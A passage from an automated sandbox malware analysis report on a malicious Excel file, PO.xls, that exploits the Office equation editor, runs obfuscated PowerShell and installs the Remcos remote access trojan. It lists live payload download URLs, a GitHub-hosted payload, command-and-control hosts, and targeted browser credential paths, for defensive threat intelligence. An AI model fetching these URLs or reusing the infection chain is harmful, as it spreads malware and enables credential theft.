                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,16_2_004520B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,16_2_00452143
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,16_2_00452393
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,16_2_00448484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,16_2_004524BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,16_2_004525C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,16_2_00452690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,16_2_0044896D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,16_2_0040F90C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,16_2_00451D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,16_2_00451FD0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004489D7 GetSystemTimeAsFileTime,16_2_004489D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041B69E GetUserNameW,16_2_0041B69E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,16_2_00449210
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.6a480d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.6a480d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.1027741834.000000000239E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1027592173.0000000000891000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.476480463.00000000065E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4036, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3044, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data16_2_0040BA4D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\16_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db16_2_0040BB6B

                    Remote Access Functionality

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-M3P7YTJump to behavior
                    Source: Yara matchFile source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.6a480d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.6a480d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.1027741834.000000000239E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1027592173.0000000000891000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.476480463.00000000065E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4036, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3044, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe16_2_0040569A
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information121
                    Scripting
                    Valid Accounts1
                    Native API
                    121
                    Scripting
                    1
                    DLL Side-Loading
                    11
                    Deobfuscate/Decode Files or Information
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    15
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts43
                    Exploitation for Client Execution
                    1
                    DLL Side-Loading
                    1
                    Bypass User Account Control
                    21
                    Obfuscated Files or Information
                    211
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol211
                    Input Capture
                    21
                    Encrypted Channel
                    Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts12
                    Command and Scripting Interpreter
                    1
                    Windows Service
                    1
                    Access Token Manipulation
                    1
                    DLL Side-Loading
                    2
                    Credentials In Files
                    1
                    System Service Discovery
                    SMB/Windows Admin Shares3
                    Clipboard Data
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution
                    Login Hook1
                    Windows Service
                    1
                    Bypass User Account Control
                    NTDS3
                    File and Directory Discovery
                    Distributed Component Object ModelInput Capture1
                    Remote Access Software
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts3
                    PowerShell
                    Network Logon Script222
                    Process Injection
                    1
                    Masquerading
                    LSA Secrets34
                    System Information Discovery
                    SSHKeylogging3
                    Non-Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials2
                    Security Software Discovery
                    VNCGUI Input Capture214
                    Application Layer Protocol
                    Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync21
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job222
                    Process Injection
                    Proc Filesystem3
                    Process Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                    Application Window Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                    Remote System Discovery
                    Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520512 Sample: PO.xls Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 54 ramcxx.duckdns.org 2->54 56 strmr.co 2->56 66 Suricata IDS alerts for network traffic 2->66 68 Found malware configuration 2->68 70 Malicious sample detected (through community Yara rule) 2->70 74 21 other signatures 2->74 10 EXCEL.EXE 59 45 2->10         started        signatures3 72 Uses dynamic DNS services 54->72 process4 dnsIp5 60 strmr.co 172.67.179.215, 443, 49163, 49167 CLOUDFLARENETUS United States 10->60 62 104.168.32.148, 49164, 49171, 49172 AS-COLOCROSSINGUS United States 10->62 48 C:\Users\user\Desktop\PO.xls (copy), Composite 10->48 dropped 14 wscript.exe 1 10->14         started        17 WINWORD.EXE 346 37 10->17         started        file6 process7 dnsIp8 90 Suspicious powershell command line found 14->90 92 Wscript starts Powershell (via cmd or directly) 14->92 94 Bypasses PowerShell execution policy 14->94 102 2 other signatures 14->102 21 powershell.exe 4 14->21         started        50 strmr.co 17->50 52 104.21.64.88, 443, 49165, 49166 CLOUDFLARENETUS United States 17->52 38 C:\Users\user\AppData\...\strmr.co.url, MS 17->38 dropped 40 C:\Users\user\AppData\Roaming\...\a9ifFT.url, MS 17->40 dropped 42 ~WRF{91BCF8F6-C2FD...D-C3013FC0B30C}.tmp, Composite 17->42 dropped 96 Microsoft Office launches external ms-search protocol handler (WebDAV) 17->96 98 Office viewer loads remote template 17->98 100 Microsoft Office drops suspicious files 17->100 24 EQNEDT32.EXE 12 17->24         started        file9 signatures10 process11 file12 76 Suspicious powershell command line found 21->76 78 Obfuscated command line found 21->78 80 Suspicious execution chain found 21->80 27 powershell.exe 12 5 21->27         started        46 C:\...\nicepicturewithyourebodygreen.vBS, Unicode 24->46 dropped 82 Office equation editor establishes network connection 24->82 84 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 24->84 signatures13 process14 dnsIp15 64 raw.githubusercontent.com 185.199.108.133, 443, 49173 FASTLYUS Netherlands 27->64 86 Writes to foreign memory regions 27->86 88 Injects a PE file into a foreign processes 27->88 31 RegAsm.exe 27->31         started        34 RegAsm.exe 3 3 27->34         started        signatures16 process17 dnsIp18 104 Contains functionality to bypass UAC (CMSTPLUA) 31->104 106 Contains functionalty to change the wallpaper 31->106 108 Contains functionality to steal Chrome passwords or cookies 31->108 114 3 other signatures 31->114 58 ramcxx.duckdns.org 45.134.140.68, 49175, 49176, 49177 INETLTDTR Georgia 34->58 44 C:\ProgramData\remcos\logs.dat, data 34->44 dropped 110 Detected Remcos RAT 34->110 112 Installs a global keyboard hook 34->112 file19 signatures20

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    PO.xls18%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
                    PO.xls100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{91BCF8F6-C2FD-4749-855D-C3013FC0B30C}.tmp100%AviraEXP/CVE-2017-11882.Gen
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://ocsp.entrust.net030%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://geoplugin.net/json.gp0%URL Reputationsafe
                    http://geoplugin.net/json.gp/C0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    strmr.co
                    172.67.179.215
                    truetrue
                      unknown
                      raw.githubusercontent.com
                      185.199.108.133
                      truefalse
                        unknown
                        ramcxx.duckdns.org
                        45.134.140.68
                        truetrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalse
                            unknown
                            http://104.168.32.148/550/RWEER.txttrue
                              unknown
                              https://strmr.co/a9ifFTfalse
                                unknown
                                http://104.168.32.148/550/ed/enwegetbacktoenitrefeaturestounderstandhowmuchgreatsheisverycutergirlwithentierthingstobegreatandfineforeverythigngetbackwithnewsystem_______veryniceperson.doctrue
                                  unknown
                                  http://104.168.32.148/550/nicepicturewithyourebodygreen.tIFtrue
                                    unknown
                                    ramcxx.duckdns.orgtrue
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://nuget.org/NuGet.exepowershell.exe, 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://crl.entrust.net/server1.crl0powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://ocsp.entrust.net03powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://contoso.com/Licensepowershell.exe, 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://contoso.com/Iconpowershell.exe, 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://104.168.32.148/550/nicepicturewithyourebodygreen.tIFjEQNEDT32.EXE, 0000000A.00000002.450753923.00000000005FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://104.168.32.148powershell.exe, 0000000E.00000002.473571085.00000000025FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                http://go.microspowershell.exe, 0000000E.00000002.473571085.00000000026E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://104.168.32.148/550/nicepicturewithyourebodygreen.tIFVtnpEQNEDT32.EXE, 0000000A.00000002.450753923.00000000005F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://geoplugin.net/json.gpRegAsm.exefalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://104.168.32.148/550/nicepicturewithyourebodygreen.tIFFtnpEQNEDT32.EXE, 0000000A.00000002.450753923.00000000005F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://raw.githubusercontent.compowershell.exe, 0000000E.00000002.473571085.000000000249B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://geoplugin.net/json.gp/Cpowershell.exe, 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.476480463.00000000065E1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://contoso.com/powershell.exe, 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://nuget.org/nuget.exepowershell.exe, 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://strmr.co/strmr.co.url.5.drfalse
                                                            unknown
                                                            https://strmr.co/a9ifFTNPO.xlsfalse
                                                              unknown
                                                              https://strmr.co/a9ifFTyX62830000.0.dr, ~DF59A7707E25171593.TMP.0.drfalse
                                                                unknown
                                                                https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfq4;powershell.exe, 0000000E.00000002.473571085.000000000249B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://ocsp.entrust.net0Dpowershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.478381867.000000000268B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.473571085.0000000002361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://secure.comodo.com/CPS0powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      172.67.179.215
                                                                      strmr.coUnited States
                                                                      13335CLOUDFLARENETUStrue
                                                                      104.168.32.148
                                                                      unknownUnited States
                                                                      36352AS-COLOCROSSINGUStrue
                                                                      45.134.140.68
                                                                      ramcxx.duckdns.orgGeorgia
                                                                      197328INETLTDTRtrue
                                                                      185.199.108.133
                                                                      raw.githubusercontent.comNetherlands
                                                                      54113FASTLYUSfalse
                                                                      104.21.64.88
                                                                      unknownUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1520512
                                                                      Start date and time:2024-09-27 12:50:07 +02:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 10m 29s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                      Number of analysed new started processes analysed:18
                                                                      Number of new started drivers analysed:1
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • GSI enabled (VBA)
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:PO.xls
                                                                      Detection:MAL
                                                                      Classification:mal100.rans.troj.spyw.expl.evad.winXLS@13/32@191/5
                                                                      EGA Information:
                                                                      • Successful, ratio: 50%
                                                                      HCA Information:
                                                                      • Successful, ratio: 97%
                                                                      • Number of executed functions: 66
                                                                      • Number of non-executed functions: 208
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .xls
                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                      • Attach to Office via COM
                                                                      • Active ActiveX Object
                                                                      • Active ActiveX Object
                                                                      • Scroll down
                                                                      • Close Viewer
                                                                      • Override analysis time to 51232.2393064938 for current running targets taking high CPU consumption
                                                                      • Override analysis time to 102464.478612988 for current running targets taking high CPU consumption
                                                                      • Override analysis time to 204928.957225975 for current running targets taking high CPU consumption
                                                                      • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                      • Execution Graph export aborted for target EQNEDT32.EXE, PID 3820 because there are no executed function
                                                                      • Execution Graph export aborted for target powershell.exe, PID 3940 because it is empty
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: PO.xls
                                                                      TimeTypeDescription
                                                                      06:51:43API Interceptor33x Sleep call for process: EQNEDT32.EXE modified
                                                                      06:51:45API Interceptor23x Sleep call for process: wscript.exe modified
                                                                      06:51:46API Interceptor117x Sleep call for process: powershell.exe modified
                                                                      06:51:56API Interceptor10978861x Sleep call for process: RegAsm.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      172.67.179.215AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                                        Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                                          104.168.32.148LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                                                          • 104.168.32.148/345/CHPPZA.txt
                                                                          BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                          • 104.168.32.148/345/CHPPZA.txt
                                                                          185.199.108.133https://arjunshaw.github.io/4.7-Project-1-Netflix-/Get hashmaliciousHTMLPhisherBrowse
                                                                            https://tokenp0kczt.net/Get hashmaliciousHTMLPhisherBrowse
                                                                              http://bafybeid2klgyiphng6ifws5s35aor57wfi3so6koe2w4ggoacn6gqghegm.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                https://4--11--1-uniswap--uncensored-eth.ipns.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                  http://web-git-tina-allow-bad-limit-uniswap.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                    http://noinstgaram.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                      SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exeGet hashmaliciousUnknownBrowse
                                                                                        SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exeGet hashmaliciousUnknownBrowse
                                                                                          http://cancelarcompravirtusucursajgbf-9mfi.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                            https://fastsoluudapppmigratee.com/Get hashmaliciousUnknownBrowse
                                                                                              104.21.64.88Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                                                                QT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                  Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                                                                    https://tamilblasters.casa/Get hashmaliciousUnknownBrowse
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      raw.githubusercontent.comSecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                                                                      • 185.199.110.133
                                                                                                      http://tokenpuzz1le.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                      • 185.199.111.133
                                                                                                      http://web-x8vjmgg79-uniswap.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                                      • 185.199.109.133
                                                                                                      https://tokenp0kczt.net/Get hashmaliciousHTMLPhisherBrowse
                                                                                                      • 185.199.110.133
                                                                                                      http://tokenpblket.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                      • 185.199.110.133
                                                                                                      http://bafybeid2klgyiphng6ifws5s35aor57wfi3so6koe2w4ggoacn6gqghegm.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                                      • 185.199.108.133
                                                                                                      https://4--11--1-uniswap--uncensored-eth.ipns.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                                      • 185.199.111.133
                                                                                                      http://web-git-tina-allow-bad-limit-uniswap.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                                      • 185.199.108.133
                                                                                                      SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 185.199.108.133
                                                                                                      SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 185.199.108.133
                                                                                                      strmr.coAGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                                                                      • 172.67.179.215
                                                                                                      Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.64.88
                                                                                                      QT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                      • 104.21.64.88
                                                                                                      Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.64.88
                                                                                                      Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.179.215
                                                                                                      ramcxx.duckdns.orgLJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                                                                                      • 45.134.140.70
                                                                                                      BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                      • 45.134.140.70
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      INETLTDTRLJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                                                                                      • 45.134.140.70
                                                                                                      BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                      • 45.134.140.70
                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 5.104.75.170
                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 5.104.75.170
                                                                                                      file_5822aee2333945a68f99cf2cfdd0e024_2024-09-16_14_28_33_034000.zipGet hashmaliciousUnknownBrowse
                                                                                                      • 84.252.92.10
                                                                                                      Google%20Chrome1.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 89.22.236.120
                                                                                                      Chrome.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 89.22.236.120
                                                                                                      LEK1JCI81P.exeGet hashmaliciousRedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWormBrowse
                                                                                                      • 91.92.120.13
                                                                                                      sVfXReO3QI.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 45.128.38.162
                                                                                                      ExeFile (305).exeGet hashmaliciousEmotetBrowse
                                                                                                      • 178.211.45.66
                                                                                                      AS-COLOCROSSINGUSGEsD6lobvy.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                                      • 172.245.123.6
                                                                                                      Shipping Document.docx.docGet hashmaliciousUnknownBrowse
                                                                                                      • 104.168.32.148
                                                                                                      Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 172.245.123.6
